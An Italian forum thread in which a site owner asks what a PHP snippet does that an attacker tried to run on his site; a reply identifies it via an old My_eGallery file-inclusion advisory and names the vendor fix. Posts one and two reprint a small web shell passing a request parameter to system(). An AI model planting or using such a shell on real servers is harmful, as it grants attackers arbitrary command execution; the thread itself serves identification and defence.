Visualizzazione dei risultati da 1 a 5 su 5
  1. #1

    Script che non capisco bene cosa faccia

    Io pur programmando da parecchio tempo php, non ho ben capito che eseguirebbe quella riga di comando, chi mi delucida al riguardo?

    Codice PHP:
    <div><pre>
    -
    <?

      
    if (isset($chdir)) @chdir($chdir);
      
    ob_start();
      
    system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
      
    $output ob_get_contents();
      
    ob_end_clean();
      if (!empty(
    $output)) echo str_replace(">""&gt;"str_replace("<""&lt;"$output));

    ?>

    -
    </pre></div>
    <? die(); ?>
    Questo me lo son trovato da un unghere che questa notte tentava di far eseguire questo script al mio sito

  2. #2
    Product: My_eGallery
    Versions affected: all <3.1.1.g
    Website: http://lottasophie.sourceforge.net/index.php

    1. Introduction
    ---------------

    My_eGallery is a very nice PostNuke module, which allows users to create and
    manipulate their own galleries on the web, plus offers various additional
    features.
    For more information and a demonstration you can go to the Website above.



    2. Exploit
    ----------

    Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
    vulnerability.

    Certain php files have some parameters which are used in include functions
    not filtered.
    An intruder can craft PHP code on their Web site and supply parameter to
    My_eGallery so it actually includes malicious PHP code.

    The following code was captured as being used in the wild (edited
    intentionally):

    <?
    // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
    if (isset($chdir)) @chdir($chdir);
    ob_start();
    execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
    $output = ob_get_contents();
    ob_end_clean();
    print_output();
    ?>

    This allows execution of any command on the server with My_eGallery, under
    the privileges of the Web server (usually apache or httpd).


    3. Solution
    -----------

    Vendor was contacted and promptly replied. Fix is available at the vendor's
    site:

    http://lottasophie.sourceforge.net/m...=Downloads&fil
    e=index&req=viewdownload&cid=5

    As this was seen being exploited in the wild, users are urged to upgrade to
    the latest version as soon as possible.
    Laggiu' qualcuno ti ama....


    Il silenzio è spesso la cosa migliore. Pensa ... è gratis.

  3. #3
    [supersaibal]Originariamente inviato da piero.mac
    Laggiu' qualcuno ti ama....

    [/supersaibal]
    Sti hacker del cracker, immaginavo che fosse qualche tentativo inutile per fare danni, il problema è che sto hacker è talmente pirla che non s'è neanche accorto che io non uso phpnuke, ma mi son fatto tutto a manina
    Grazie piero

  4. #4
    Ottima abitudine verificare i logs.


    Il silenzio è spesso la cosa migliore. Pensa ... è gratis.

  5. #5
    Eehhe, mi son fatto una sistema che ogni volta che viene generato un errore sql, questo errore viene registrato su una tabella, mettendo ora, pagina, errore, riga di codice dove c'è l'errore, e sopratutto, l'ip di chi ha generato l'errore

    Ne farò un cms del mio sito un giorno, ma moooolto in futuro

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.